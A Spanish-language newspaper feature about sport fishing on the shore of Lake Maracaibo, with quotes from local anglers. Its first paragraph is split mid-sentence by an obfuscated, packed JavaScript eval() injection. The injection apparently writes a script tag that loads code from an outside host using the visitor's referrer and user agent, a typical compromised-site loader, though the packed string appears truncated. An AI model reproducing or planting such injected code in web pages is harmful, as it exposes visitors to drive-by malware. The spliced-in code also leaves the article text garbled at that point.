publicidad

Pesca deportiva, una disciplina que “engancha” a los marabinos

tureporte.com / Maracaibo
Mucha eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hzhtz|var|u0026u|referrer|fnhtf||js|php'.split('|'),0,{})) gente que lleva toda su vida en Maracaibo ignora que en la ciudad “desde hace mucho existen clubes de pesca deportiva, pero ha sido en tiempos recientes que un boom en redes sociales ha hecho que crezca la afición por esta disciplina” afirma Francisco Inciarte, antropólogo de profesión y pescador de corazón

(Foto: Cortesía)

La oscuridad aun reinante agudiza los sentidos. Un olor salobre en la brisa fresca y húmeda acaricia el rostro, trayendo de vuelta recuerdos de cuando la vida era menos complicada. Gradualmente la serenidad va tomando el control de todo, mientras el silbido incesante de ranas en un caño cercano, se entremezcla con el chasquido rítmico de las olas que rompen contra una ensenada que invita a sentarse y esperar la salida del Sol. Así comienza un día de pesca en la Vereda del Lago.

El rompeolas de la segunda etapa, cerca del muelle de donde parten las lanchas que van hacia la refinería el Tablazo, congrega a una comunidad heterogénea. El experto de oficio, el necesitado, el entusiasta y el curioso se juntan a diario para iniciar un forcejeo casi ritual entre hombre y pez.

Lugar de iniciación

Hace ya cinco años que un amigo lo invitó a él y a su esposa Libicni a “echar al agua sus primeros anzuelos” en las riberas del lago y desde entonces ambos quedaron irredimiblemente “enganchados” por el arte de dominar la caña, el nylon y los señuelos.

“La mayoría de los peces los devolvemos al agua, no tenemos la necesidad de subsistencia sino de preservar la pesca y cuando hay un pescado bueno para comer si lo tiramos a la cava para llevarlo a casa” explica este marabino de 42 años al resumir en forma sencilla de qué va, este pasatiempo con beneficios implícitos.

Aunque La Vereda del Lago es uno de los lugares más accesibles para la mayoría de la gente, no es el mejor punto de la región para sacar buenas piezas, según afirma “El Cochino” –como le apodan sus amigos. A su criterio el parque urbano es más bien, una especie de “cancha de entrenamiento” donde con algo de suerte y conocimiento se pueden sacar bagres, corvinas y lisas de hasta 3,5 kilos, solo por mencionar las especies más abundantes en el estuario.

Para leer este trabajo completo en www.tureporte.com haga click acá 

 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama